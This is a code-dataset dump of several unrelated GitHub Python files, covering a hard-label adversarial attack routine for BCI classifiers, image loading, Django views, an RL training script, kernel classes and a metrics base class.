  def attack_hard_label(self, x, y, target=None, query_limit=10000, seed=None):\n        \"\"\" Attack the original image and return adversarial example\n            model: (pytorch model)\n            (x, y): original image\n        \"\"\"\n        shape = list(x.shape)\n        dim = np.prod(shape[1:])\n        lb, ub = x.min(), x.max()\n        if seed is not None:\n            np.random.seed(seed)\n\n        # init variables\n        self.queries = torch.zeros_like(y).to(self.device)\n        self.sgn_t = torch.sign(torch.ones(shape)).to(self.device)\n        self.d_t = 
torch.ones_like(y).float().fill_(float(\"Inf\")).to(self.device)\n working_ind = (self.d_t > self.epsilon).nonzero().flatten()\n\n stop_queries = self.queries.clone()\n dist = self.d_t.clone()\n self.x_final = self.get_xadv(x, self.sgn_t, self.d_t, lb, ub)\n \n block_level = 0\n block_ind = 0\n for i in range(query_limit):\n block_num = 2 ** block_level\n block_size = int(np.ceil(dim / block_num))\n start, end = block_ind * block_size, min(dim, (block_ind + 1) * block_size)\n\n valid_mask = (self.queries < query_limit) \n attempt = self.sgn_t.clone().view(shape[0], dim)\n attempt[valid_mask.nonzero().flatten(), start:end] *= -1.\n attempt = attempt.view(shape)\n\n self.binary_search(x, y, target, attempt, valid_mask)\n\n block_ind += 1\n if block_ind == 2 ** block_level or end == dim:\n block_level += 1\n block_ind = 0\n\n dist = torch.norm((self.x_final - x).view(shape[0], -1), self.ord, 1)\n stop_queries[working_ind] = self.queries[working_ind]\n working_ind = (dist > self.epsilon).nonzero().flatten()\n\n if torch.sum(self.queries >= query_limit) == shape[0]:\n print('out of queries')\n break\n\n print('d_t: %.4f | adbd: %.4f | queries: %.4f | rob acc: %.4f | iter: %d'\n % (torch.mean(self.d_t), torch.mean(dist), torch.mean(self.queries.float()),\n len(working_ind) / len(x), i + 1))\n \n\n stop_queries = torch.clamp(stop_queries, 0, query_limit)\n return self.x_final, stop_queries, dist, (dist <= self.epsilon)\n \n\n def attack_batch(self, x, y, target=None, query_limit=5000, seed=None):\n data_loader = DataLoader(dataset=TensorDataset(x, target if target!=None else y),\n batch_size=1024,\n shuffle=False,\n drop_last=False)\n\n for step, (batch_x, batch_y) in enumerate(data_loader):\n batch_x = batch_x.clone().detach().to(self.device)\n batch_y = batch_y.clone().detach().to(self.device)\n\n batch_adv_x, _, _, _ = self.attack_hard_label(batch_x, batch_y, target=batch_y if target!=None else None, query_limit=query_limit)\n \n # projection\n if self.ord == np.inf:\n delta = torch.clamp(batch_adv_x - batch_x, min=-self.epsilon, max=self.epsilon)\n else:\n delta = batch_adv_x - batch_x\n delta_norms = torch.norm(delta.view(len(batch_x), -1),\n p=2,\n dim=1)\n factor = torch.min(self.epsilon / delta_norms,\n torch.ones_like(delta_norms))\n delta = delta * factor.view(-1, 1, 1, 1)\n\n batch_adv_x = (batch_x + delta).detach()\n\n if step == 0: adv_x = batch_adv_x\n else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n return adv_x.cpu()\n\n # check whether solution is found\n def search_succ(self, x, y, target, mask):\n self.queries[mask] += 1\n if target!=None:\n return self.model.predict_label(x[mask]) == target[mask]\n else:\n return self.model.predict_label(x[mask]) != y[mask]\n\n # binary search for decision boundary along sgn direction\n def binary_search(self, x, y, target, sgn, valid_mask, tol=1e-3):\n lb, ub = x.min(), x.max()\n sgn_norm = torch.norm(sgn.view(len(x), -1), 2, 1)\n sgn_unit = sgn / sgn_norm.view(len(x), 1, 1, 1)\n\n d_start = torch.zeros_like(y).float().to(self.device)\n d_end = self.d_t.clone()\n\n initial_succ_mask = self.search_succ(self.get_xadv(x, sgn_unit, self.d_t, lb, ub), y, target, valid_mask)\n to_search_ind = valid_mask.nonzero().flatten()[initial_succ_mask]\n d_end[to_search_ind] = torch.min(self.d_t, sgn_norm)[to_search_ind]\n\n while len(to_search_ind) > 0:\n d_mid = (d_start + d_end) / 2.0\n search_succ_mask = self.search_succ(self.get_xadv(x, sgn_unit, d_mid, lb, ub), y, target, to_search_ind)\n d_end[to_search_ind[search_succ_mask]] = 
d_mid[to_search_ind[search_succ_mask]]\n d_start[to_search_ind[~search_succ_mask]] = d_mid[to_search_ind[~search_succ_mask]]\n to_search_ind = to_search_ind[((d_end - d_start)[to_search_ind] > tol)]\n\n to_update_ind = (d_end < self.d_t).nonzero().flatten()\n if len(to_update_ind) > 0:\n self.d_t[to_update_ind] = d_end[to_update_ind]\n self.x_final[to_update_ind] = self.get_xadv(x, sgn_unit, d_end, lb, ub)[to_update_ind]\n self.sgn_t[to_update_ind] = sgn[to_update_ind]\n\n def __call__(self, data, label, target=None, query_limit=10000):\n return self.attack_hard_label(data, label, target=target, query_limit=query_limit)","repo_name":"lbinmeng/bci_adv_defense","sub_path":"attack_lib.py","file_name":"attack_lib.py","file_ext":"py","file_size_in_byte":20907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70373575786","text":"\"\"\"\nThis module provides everything needed for data loading and pre-processing\nfor the image classification approach.\n\"\"\"\nimport logging\nimport math\nfrom typing import List, Optional, Tuple, Callable, Union\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport cv2 as cv\n\nfrom ..constants import LABEL_MAP\nfrom ..data.common import Sample\nfrom ..data.generate_tfrecord import read_tfrecord\n\nlog = logging.getLogger(__name__)\n\n\nclass JointsSequence(tf.keras.utils.Sequence):\n \"\"\"\n Implements a Keras Sequence dataset, which will allow the fit API to load\n multiple batches in parallel.\n \"\"\"\n\n def __init__(\n self,\n csv_path_or_df: Union[str, pd.DataFrame],\n split: Optional[str] = None,\n crop_width: int = 299,\n crop_height: int = 299,\n batch_size: int = 32,\n random_crop: bool = True,\n augment_data: bool = True,\n adaptive_threshold: bool = False,\n ):\n\n if isinstance(csv_path_or_df, str):\n with open(csv_path_or_df, 'r') as f:\n df = pd.read_csv(f)\n\n if split is not None:\n df = df[df['split'] == split]\n elif isinstance(csv_path_or_df, pd.DataFrame):\n df = csv_path_or_df\n else:\n raise ValueError\n\n self._df = df\n\n self._crop_width = crop_width\n self._crop_height = crop_height\n self._batch_size = batch_size\n self._random_crop = random_crop\n self._augment_data = augment_data\n self._adaptive_threshold = adaptive_threshold\n\n def __len__(self) -> int:\n return math.ceil(len(self._df) / self._batch_size)\n\n def __getitem__(self, index: int) -> Tuple[tf.Tensor, tf.Tensor]:\n\n images = []\n labels = []\n\n low = index * self._batch_size\n high = (index + 1) * self._batch_size\n for i in range(low, high if high < len(self._df) else len(self._df)):\n sample = Sample.from_dataframe(self._df.iloc[i])\n image, label = self._load_sample(sample)\n\n images.append(image)\n labels.append(label)\n\n return tf.stack(images, axis=0), tf.stack(labels)\n\n def on_epoch_end(self):\n pass\n\n def _load_sample(self, sample: Sample) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"\n Loads a single sample from disk.\n\n Parameters\n ----------\n sample: Sample\n Data required to load the sample.\n\n Returns\n -------\n tf.Tensor, tf.Tensor\n image and label\n \"\"\"\n image = read_image(sample.filepath, 'png', self._adaptive_threshold)\n\n image = preprocess(\n image,\n sample.bbox.to_pascal_voc(),\n self._crop_width,\n self._crop_height,\n self._random_crop,\n self._augment_data,\n )\n\n label = tf.one_hot(LABEL_MAP[sample.bbox.cls] - 1, 2)\n\n return image, label\n\n\ndef shift_lower(bndbox: List[int]) -> List[int]:\n \"\"\"\n Shift bounding box upwards, if lower bounds 
are negative\n (out of bounds)\n\n Parameters\n ----------\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1]\n\n Returns\n -------\n Updated bounding box in the same shape as input.\n \"\"\"\n x0, x1, y0, y1 = bndbox\n # shift box in case of negative values\n x_offset_low = -tf.math.minimum(x0, tf.constant(0))\n y_offset_low = -tf.math.minimum(y0, tf.constant(0))\n\n x0 += x_offset_low\n x1 += x_offset_low\n y0 += y_offset_low\n y1 += y_offset_low\n\n return [x0, x1, y0, y1]\n\n\ndef shift_upper(bndbox: List[int], max_x: int, max_y: int) -> List[int]:\n \"\"\"\n Shift bounding box downwards, if upper bounds are beyond image edge\n (out of bounds)\n\n Parameters\n ----------\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n max_x : int\n Image width\n max_y : int\n Image height\n\n Returns\n -------\n Updated bounding box in the same shape as input.\n \"\"\"\n\n x0, x1, y0, y1 = bndbox\n # shift box in case of OOB values\n log.debug(f'max x: {max_x}, x1: {x1}')\n x_offset_up = tf.math.maximum(max_x, x1) - max_x\n y_offset_up = tf.math.maximum(max_y, y1) - max_y\n\n x0 -= x_offset_up\n x1 -= x_offset_up\n y0 -= y_offset_up\n y1 -= y_offset_up\n\n return [x0, x1, y0, y1]\n\n\ndef random_crop_bbox(\n image: tf.Tensor,\n bndbox: List[tf.Tensor],\n width: int = 299,\n height: int = 299,\n) -> tf.Tensor:\n \"\"\"\n Random crop an area around a bounding box to a fixed size.\n If output size is greater than maximum crop size the image will\n be zero-padded.\n\n Parameters\n ----------\n image : np.ndarray\n image array of size [height, width, 3]\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n width : int\n Cropped image width\n height : int\n Cropped image height\n\n Returns\n -------\n Crop of image.\n \"\"\"\n max_x, max_y = tf.shape(image)[1], tf.shape(image)[0]\n\n crop_width = bndbox[1] - bndbox[0]\n crop_height = bndbox[3] - bndbox[2]\n\n offset_x = tf.random.uniform(\n [1], 0, tf.reshape(width - crop_width, []), dtype=tf.int64\n )\n offset_y = tf.random.uniform(\n [1], 0, tf.reshape(height - crop_height, []), dtype=tf.int64\n )\n\n log.debug(f'Sampled offsets: x: {offset_x}, y: {offset_y}')\n\n log.debug(f'Original bounding box: {bndbox}')\n\n x0, x1 = bndbox[0] - offset_x, bndbox[1] + (width - crop_width - offset_x)\n y0, y1 = bndbox[2] - offset_y, bndbox[3] + (\n height - crop_height - offset_y\n )\n\n box = [x0, x1, y0, y1]\n\n box = list(map(lambda x: tf.squeeze(tf.cast(x, tf.int32)), box))\n box = shift_upper(box, max_x, max_y)\n box = list(map(lambda x: tf.squeeze(tf.cast(x, tf.int32)), box))\n box = shift_lower(box)\n log.debug(f'Updated bounding box: {box}')\n\n return crop_and_pad(image, box, width, height)\n\n\ndef center_crop_bbox(\n image: tf.Tensor, bndbox: list, width: int = 299, height: int = 299\n) -> tf.Tensor:\n \"\"\"\n Center crop an area around a bounding box to a fixed size.\n If output size is greater than maximum crop size the image will\n be zero-padded.\n\n Parameters\n ----------\n image : tf.Tensor\n image array of size [height, width, 3]\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n width : int\n Cropped image width\n height : int\n Cropped image height\n\n Returns\n -------\n Crop of image.\n \"\"\"\n y_max, x_max = tf.shape(image)[0], tf.shape(image)[1]\n\n crop_width = bndbox[1] - bndbox[0]\n crop_height = bndbox[3] - bndbox[2]\n\n x0, x1, y0, y1 = bndbox\n x0 -= tf.cast(tf.math.floor((width - crop_width) / 2), tf.int64)\n x1 += tf.cast(tf.math.ceil((width - crop_width) / 2), 
tf.int64)\n y0 -= tf.cast(tf.math.floor((height - crop_height) / 2), tf.int64)\n y1 += tf.cast(tf.math.ceil((height - crop_height) / 2), tf.int64)\n\n x0 = tf.cast(x0, tf.int32)\n x1 = tf.cast(x1, tf.int32)\n y0 = tf.cast(y0, tf.int32)\n y1 = tf.cast(y1, tf.int32)\n box = shift_upper([x0, x1, y0, y1], x_max, y_max)\n box = shift_lower(box)\n\n return crop_and_pad(image, box, width, height)\n\n\ndef crop_and_pad(\n image: tf.Tensor, bndbox: List[int], width: int = 299, height: int = 299\n) -> tf.Tensor:\n \"\"\"\n Crop image to specific size using bounding box,\n zero-pad if crop is too large.\n\n Parameters\n ----------\n image : tf.Tensor\n image array of size [height, width, 3]\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n width : int\n Cropped image width\n height : int\n Cropped image height\n\n Returns\n -------\n Crop of image.\n \"\"\"\n\n bndbox = list(map(lambda x: tf.squeeze(tf.cast(x, tf.int32)), bndbox))\n x0, x1, y0, y1 = bndbox\n\n image = image[y0:y1, x0:x1, :]\n image = tf.image.pad_to_bounding_box(image, 0, 0, height, width)\n\n return image\n\n\ndef read_image(\n image_path: str,\n fmt: Optional[str] = None,\n adaptive_threshold: bool = False,\n) -> tf.Tensor:\n image = tf.io.read_file(image_path)\n\n if fmt == 'png':\n image = tf.image.decode_png(image, channels=3)\n elif fmt == 'jpeg':\n image = tf.image.decode_jpeg(image, channels=3)\n else:\n image = tf.image.decode_image(image, channels=3)\n\n # does only work in eager mode\n if adaptive_threshold:\n image = image.numpy().astype(np.uint8)\n image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n image = cv.adaptiveThreshold(\n image,\n 255.0,\n cv.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv.THRESH_BINARY_INV,\n 15,\n 3,\n )\n image = cv.cvtColor(image, cv.COLOR_GRAY2BGR)\n image = tf.convert_to_tensor(image, tf.float32)\n else:\n image = tf.cast(image, tf.float32)\n\n return image\n\n\ndef augment(image: tf.Tensor) -> tf.Tensor:\n \"\"\"\n Augments 3-channel image tensors.\n\n Parameters\n ----------\n image: tf.Tensor\n\n Returns\n -------\n tf.Tensor\n \"\"\"\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n image = tf.image.random_contrast(image, 0.0, 0.8)\n image = tf.image.random_saturation(image, 0.0, 4.0)\n image = tf.image.random_brightness(image, 0.5)\n return image\n\n\ndef preprocess(\n image: tf.Tensor,\n bbox: List[tf.Tensor],\n width: int = 299,\n height: int = 299,\n random_crop: bool = True,\n augment_data: bool = True,\n preprocess_fn: Callable = None,\n):\n if random_crop:\n image = random_crop_bbox(image, bbox, width, height)\n else:\n image = center_crop_bbox(image, bbox, width, height)\n\n if augment_data:\n image = augment(image)\n if preprocess_fn is not None:\n image = preprocess_fn(image)\n\n return image\n","repo_name":"antolu/aisi-joints","sub_path":"aisi_joints/img_cls/_dataloader.py","file_name":"_dataloader.py","file_ext":"py","file_size_in_byte":9892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7193921781","text":"import numpy as np\nimport pandas as pd\nfrom pandas_profiling import ProfileReport\n#print(np.random.rand(100, 5))\ndf = pd.DataFrame([[33256]], columns=[\"TotalUsers\"])\n#profile = ProfileReport(df, title=\"Welcome to IdP Reporting\")\nprofile = df.profile_report(\n interactions ={\n \"continuous\":False,\n },\n correlations={\n \"pearson\": {\"calculate\": False},\n \"spearman\": {\"calculate\": False},\n \"kendall\": {\"calculate\": False},\n \"phi_k\": 
{\"calculate\": False},\n \"cramers\": {\"calculate\": False},\n },\n missing_diagrams={\n \"heatmap\": False,\n \"dendrogram\": False,\n \"matrix\":False,\n \"bar\":False,\n },\n title=\"IdP Reporting\",\n sort=\"ascending\",\n variables = {\n \"descriptions\":{\n \"Explicaicon por dentro\":\"VAmos a ver\"\n }\n },\n vars={\n \"num\": {\n \"quantiles\":[0.0,1.0],\n \"skewness_threshold\":0,\n \"low_categorical_threshold\": 0,\n },\n \"cat\": {\n \"length\": False,\n \"characters\": False,\n \"words\": False,\n \"cardinality_threshold\":0,\n \"chi_squared_threshold\":0.0,\n \"n_obs\": 0,\n },\n \"bool\": {\n \"n_obs\": 0\n }\n },\n)\n\nprofile.config.variables.descriptions = {\n \"TotalUsers\": \"Usuarios ingresados durante la semana\",\n}\n\nprofile.config.html.minify_html = True\nprofile.to_file(\"report.html\")\n\n#profile.to_file(\"your_report.html\")","repo_name":"juliandecoss/scripts","sub_path":"nogit/aws/src/cloudwatch/pandas_pro.py","file_name":"pandas_pro.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6078628853","text":"from django.urls import path\nfrom . import views\nfrom users.views import AccountDetailView, Leaderboard\n\napp_name = \"users\"\n\nurlpatterns = [\n path(\"leaderboard/\", Leaderboard.as_view(), name=\"leaderboard\"),\n path(\"profile/register/\", views.signup, name=\"register\"),\n path(\"profile/edit/\", views.profile, name=\"profile\"),\n path(\"user//\", AccountDetailView.as_view(), name=\"profilepage\"),\n]\n","repo_name":"The-Domecode/domecode-opensource","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"37"} +{"seq_id":"73573527466","text":"from django.contrib.auth.views import LogoutView\nfrom django.urls import reverse_lazy\nfrom django.http import HttpResponse, HttpRequest\n\n\nclass MyLogoutView(LogoutView):\n next_page = reverse_lazy('myauth:login')\n\n\ndef set_cookie_view(request: HttpRequest) -> HttpResponse:\n response = HttpResponse(\"Cookies were successfully set\")\n response.set_cookie(\"user\",\n request.META['USER'],\n max_age=1800,\n httponly=True,\n )\n response.set_cookie(\"userIP\",\n request.META['REMOTE_ADDR'],\n max_age=1800,\n httponly=True,\n )\n return response\n\n\ndef get_cookie_view(request: HttpRequest) -> HttpResponse:\n user = request.COOKIES.get(\"user\", \"no user\")\n user_ip = request.COOKIES.get(\"userIP\", \"no IP\")\n return HttpResponse(f\"

    Cookies set by set_cookie_view function:

    \"\n f\"Username = {user!r}
    User IP = {user_ip}\")\n\n\ndef set_session_view(request: HttpRequest) -> HttpResponse:\n key = \"homework_status\"\n value = \"completed\"\n request.session[key] = value\n return HttpResponse(f\"

    Session key = {key} successfully set to {value!r}

    \")\n\n\ndef get_session_view(request: HttpRequest) -> HttpResponse:\n key = \"homework_status\"\n value = request.session.get(key, \"unknown\")\n return HttpResponse(f\"

    Session Homework Status

    {key} is {value!r} now.\")\n","repo_name":"MikhailNartsissov/SkillboxDjango","sub_path":"M_08_Auth/mysite/myauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70083579308","text":"import sys\n\ninput = sys.stdin.readline\n\nh, m, s = list(map(int, input().split()))\n\nq = int(input())\n\nfor _ in range(q):\n k = list(map(int, input().split()))\n\n if k[0] == 3:\n print(h, m, s)\n else:\n k[1] %= 24 * 60 * 60 # s가 음수가 되지 않도록 반복 회전에 대해 나머지 처리\n if k[0] == 1:\n s += k[1]\n else:\n s += 24 * 60 * 60 - k[1]\n\n if s >= 60:\n m += int(s / 60)\n s %= 60\n if m >= 60:\n h += int(m / 60)\n m %= 60\n if h >= 24:\n h %= 24\n","repo_name":"jeongth9446/problem-solving","sub_path":"acmicpc/python/12840_창용이의 시계.py","file_name":"12840_창용이의 시계.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6103035322","text":"from tactile_gym.rl_envs.demo_rl_env_base import demo_rl_env\nfrom tactile_gym.rl_envs.exploration.surface_follow.surface_follow_goal.surface_follow_goal_env import (\n SurfaceFollowGoalEnv,\n)\n\nimport torch\nimport os\nimport numpy as np\nfrom stable_baselines3 import DDPG, TD3, A2C,HerReplayBuffer\nfrom stable_baselines3.common.callbacks import CheckpointCallback\nfrom stable_baselines3.common.callbacks import EvalCallback\nfrom stable_baselines3.common.noise import NormalActionNoise\nimport h5py\nimport imageio\nfrom sb3_contrib import TQC\n\ndef main():\n\n seed = int(0)\n num_iter = 100\n max_steps = 1000\n show_gui = True\n show_tactile = False\n render = False\n model_test = True\n print_info = False\n image_size = [128, 128]\n env_modes = {\n # which dofs can have movement\n # 'movement_mode':'yz',\n # 'movement_mode':'xyz',\n # 'movement_mode':'yzRx',\n #\"movement_mode\": \"xRz\",\n \"movement_mode\": \"xyzRxRy\",\n\n # specify arm\n \"arm_type\": \"ur5\",\n\n # specify tactile sensor\n \"tactile_sensor_name\": \"tactip\",\n # \"tactile_sensor_name\": \"digit\",\n # \"tactile_sensor_name\": \"digitac\",\n\n # the type of control used\n # 'control_mode':'TCP_position_control',\n \"control_mode\": \"TCP_velocity_control\",\n\n # noise params for additional robustness\n \"noise_mode\": \"simplex\",\n\n # which observation type to return\n #'observation_mode': 'oracle',\n # \"observation_mode\": \"tactile_and_feature\",\n # 'observation_mode':'visual_and_feature',\n # 'observation_mode':'visuotactile_and_feature',\n 'observation_mode':'encodedimg_privilege_feature',\n\n # which reward type to use (currently only dense)\n \"reward_mode\": \"dense\"\n # 'reward_mode':'sparse'\n }\n\n env = SurfaceFollowGoalEnv(\n max_steps=max_steps,\n env_modes=env_modes,\n show_gui=show_gui,\n show_tactile=show_tactile,\n image_size=image_size,\n )\n\n # set seeding\n env.seed(seed)\n \n #env.action_space.np_random.seed(seed)\n print(env.observation_space)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n action_noise = NormalActionNoise(mean=np.zeros(env.action_space.shape[-1]), sigma=0.1 * np.ones(env.action_space.shape[-1]))\n \n policy_kwargs = dict(n_critics=2, activation_fn=torch.nn.ReLU, net_arch=[512, 256, 128])\n #policy_kwargs = dict(activation_fn=torch.nn.ReLU, net_arch=[512, 256, 128])\n\n model = TQC(\"MultiInputPolicy\", env,learning_rate=1e-3, batch_size=256,\n tau=0.001, gamma=0.95, action_noise=action_noise, 
buffer_size=int(1e6), train_freq=(5, 'step'),\n learning_starts=10000, policy_kwargs=policy_kwargs, device=device,tensorboard_log=\"../tensorboard_logs/surface/\",verbose=1)\n #model = RecurrentPPO(\"MultiInputLstmPolicy\", env, learning_rate=1e-3, batch_size=256, policy_kwargs=policy_kwargs, device=device,tensorboard_log=\"../tensorboard_logs/\",verbose=1)\n render_frames = []\n if model_test:\n #model = TQC.load(\"../model/tactile_vae.zip\", env)\n obs = env.reset()\n sum_reward = 0\n for i in range(5):\n obs = env.reset()\n #print(obs)\n for i in range(1000):\n #print(type(obs))\n action,_ = model.predict(observation=obs)\n #print(type(action))\n #action = env.action_space.sample()\n #f.create_dataset('data_'+str(i), data=env.current_img)\n \n action = [0,0,0,0,0.1]\n print(action)\n obs, reward, done, info = env.step(action)\n #print(obs)\n sum_reward += reward\n if done:\n break\n render_img = env.render()\n render_frames.append(render_img)\n #print(sum_reward)\n sum_reward = 0 \n #imageio.mimwrite(os.path.join(\"example_videos\", \"surface.mp4\"), np.stack(render_frames), fps=12)\n else : \n if os.path.exists(\"../model/surface/best_model.zip\"):\n #model = SAC.load(\"../model/tactile_vae.zip\",env)\n print(\"pretrain\")\n eval_callback = EvalCallback(env, best_model_save_path='../model_checkpoints/edge/',\n log_path='../model_checkpoints/logs/', eval_freq=10000,\n deterministic=True, render=False)\n model.learn(total_timesteps=500000, callback=eval_callback)\n model.save(\"../model_checkpoints/surface/model.zip\")\n \n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Peng-Bryant/Learning_based-Tactile-Feedback-Control-Framework","sub_path":"tactile_gym/scripts/tactile_rl_surface.py","file_name":"tactile_rl_surface.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3803300428","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport tensorflow as tf\n\nfrom .square_curlfree import SquareCurlFree\nfrom kscore.utils import median_heuristic\n\nclass CurlFreeIMQ(SquareCurlFree):\n def __init__(self, kernel_hyperparams=None, heuristic_hyperparams=median_heuristic):\n super().__init__(kernel_hyperparams, heuristic_hyperparams)\n\n def _gram_derivatives_impl(self, r, norm_rr, sigma):\n inv_sqr_sigma = 1.0 / tf.square(sigma)\n imq = tf.math.rsqrt(1.0 + norm_rr * inv_sqr_sigma) # [M, N]\n imq_2 = 1.0 / (1.0 + norm_rr * inv_sqr_sigma)\n G_1st = -0.5 * imq_2 * inv_sqr_sigma * imq\n G_2nd = -1.5 * imq_2 * inv_sqr_sigma * G_1st\n G_3rd = -2.5 * imq_2 * inv_sqr_sigma * G_2nd\n return r, norm_rr, G_1st, G_2nd, G_3rd\n\nclass CurlFreeIMQp(SquareCurlFree):\n def __init__(self, p=0.5, kernel_hyperparams=None, heuristic_hyperparams=median_heuristic):\n super().__init__(kernel_hyperparams, heuristic_hyperparams)\n self._p = p\n\n def _gram_derivatives_impl(self, r, norm_rr, sigma):\n inv_sqr_sigma = 1.0 / tf.square(sigma)\n imq = 1.0 / (1.0 + norm_rr * inv_sqr_sigma)\n imq_p = tf.pow(imq, self._p) # [M, N]\n G_1st = -(0. + self._p) * imq * inv_sqr_sigma * imq_p\n G_2nd = -(1. + self._p) * imq * inv_sqr_sigma * G_1st\n G_3rd = -(2. 
+ self._p) * imq * inv_sqr_sigma * G_2nd\n return r, norm_rr, G_1st, G_2nd, G_3rd\n","repo_name":"miskcoo/kscore","sub_path":"kscore/kernels/curlfree_imq.py","file_name":"curlfree_imq.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"2348163850","text":"import logging\nimport os\nimport types\nfrom contextlib import contextmanager\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\nimport pyarrow as pa\nfrom filelock import FileLock, Timeout\n\nfrom .arrow_dataset import Dataset\nfrom .arrow_reader import ArrowReader\nfrom .arrow_writer import ArrowWriter\nfrom .info import MetricInfo\nfrom .naming import camelcase_to_snakecase\nfrom .utils import HF_METRICS_CACHE, Version, copyfunc\nfrom .utils.download_manager import DownloadManager\nfrom .utils.file_utils import DownloadConfig\n\n\nlogger = logging.getLogger(__file__)\n\n\n@contextmanager\ndef temp_seed(seed: int):\n state = np.random.get_state()\n np.random.seed(seed)\n try:\n yield\n finally:\n np.random.set_state(state)\n\n\nclass Metric(object):\n def __init__(\n self,\n name: str = None,\n experiment_id: Optional[str] = None,\n process_id: int = 0,\n num_process: int = 1,\n data_dir: Optional[str] = None,\n in_memory: bool = False,\n hash: str = None,\n seed: Optional[int] = None,\n **kwargs,\n ):\n \"\"\" A Metrics is the base class and common API for all metrics.\n Args:\n process_id (``int``): specify the id of the node in a distributed settings between 0 and num_nodes-1\n This can be used, to compute metrics on distributed setups\n (in particular non-additive metrics like F1).\n data_dir (``str``): path to a directory in which temporary data will be stored.\n This should be a shared file-system for distributed setups.\n hash (``str``): can be used to define a hash specific to the metrics computation script\n This prevents the metric's data to be overridden when the metric loading script is modified.\n experiment_id (Optional ``str``): Should be used if you perform several concurrent experiments using\n the same caching directory (will be indicated in the raise error)\n in_memory (``bool``): keep all predictions and references in memory. 
Not possible in distributed settings.\n seed (Optional ``int``): If specified, this will temporarily set numpy's random seed when :func:`nlp.Metric.compute` is run.\n \"\"\"\n # Safety checks\n assert isinstance(process_id, int) and process_id >= 0, \"'process_id' should be a number greater than 0\"\n assert (\n isinstance(num_process, int) and num_process > process_id\n ), \"'num_process' should be a number greater than process_id\"\n assert (\n process_id == 0 or not in_memory\n ), \"Using 'in_memory' is not possible in distributed setting (process_id > 0).\"\n\n # Metric name\n self.name = camelcase_to_snakecase(self.__class__.__name__)\n # Configuration name\n self.config_name: str = name or \"default\"\n\n self.process_id = process_id\n self.num_process = num_process\n self.in_memory = in_memory\n self.experiment_id = experiment_id if experiment_id is not None else \"cache\"\n self.hash = hash\n self._version = \"1.0.0\"\n self._data_dir_root = os.path.expanduser(data_dir or HF_METRICS_CACHE)\n self.data_dir = self._build_data_dir()\n self.seed: int = seed or np.random.get_state()[1][0]\n\n # prepare info\n info = self._info()\n info.metric_name = self.name\n info.config_name = self.config_name\n info.version = self._version\n self.info = info\n\n # Update 'compute' and 'add' docstring\n # methods need to be copied otherwise it changes the docstrings of every instance\n self.compute = types.MethodType(copyfunc(self.compute), self)\n self.add_batch = types.MethodType(copyfunc(self.add_batch), self)\n self.add = types.MethodType(copyfunc(self.add), self)\n self.compute.__func__.__doc__ += self.info.inputs_description\n self.add_batch.__func__.__doc__ += self.info.inputs_description\n self.add.__func__.__doc__ += self.info.inputs_description\n\n self.arrow_schema = pa.schema(field for field in self.info.features.type)\n self.buf_writer = None\n self.writer = None\n self.writer_batch_size = None\n self.data = None\n\n # Check we can write on the cache file without competitors\n self.cache_file_name = self._get_cache_path(self.process_id)\n self.filelock = FileLock(self.cache_file_name + \".lock\")\n try:\n self.filelock.acquire(timeout=1)\n except Timeout:\n raise ValueError(\n \"Cannot acquire lock, caching file might be used by another process, \"\n \"you should setup a unique 'experiment_id' for this run.\"\n )\n\n def _relative_data_dir(self, with_version=True):\n \"\"\" Relative path of this metric in cache_dir:\n Will be:\n self.name/self.config_name/self.config.version/self.hash/\n If any of these element is missing or if ``with_version=False`` the corresponding subfolders are dropped.\n \"\"\"\n builder_data_dir = os.path.join(self.name, self.config_name)\n if with_version:\n builder_data_dir = os.path.join(builder_data_dir, str(self._version))\n if self.hash:\n builder_data_dir = os.path.join(builder_data_dir, self.hash)\n return builder_data_dir\n\n def _build_data_dir(self):\n \"\"\" Return the directory for the current version.\n \"\"\"\n builder_data_dir = os.path.join(self._data_dir_root, self._relative_data_dir(with_version=False))\n version_data_dir = os.path.join(self._data_dir_root, self._relative_data_dir(with_version=True))\n\n def _other_versions_on_disk():\n \"\"\"Returns previous versions on disk.\"\"\"\n if not os.path.exists(builder_data_dir):\n return []\n\n version_dirnames = []\n for dir_name in os.listdir(builder_data_dir):\n try:\n version_dirnames.append((Version(dir_name), dir_name))\n except ValueError: # Invalid version (ex: incomplete data dir)\n pass\n 
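# note (added): the reverse sort below puts the newest version first, so version_dirs[0] in the caller is the most recent version found on disk\n            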
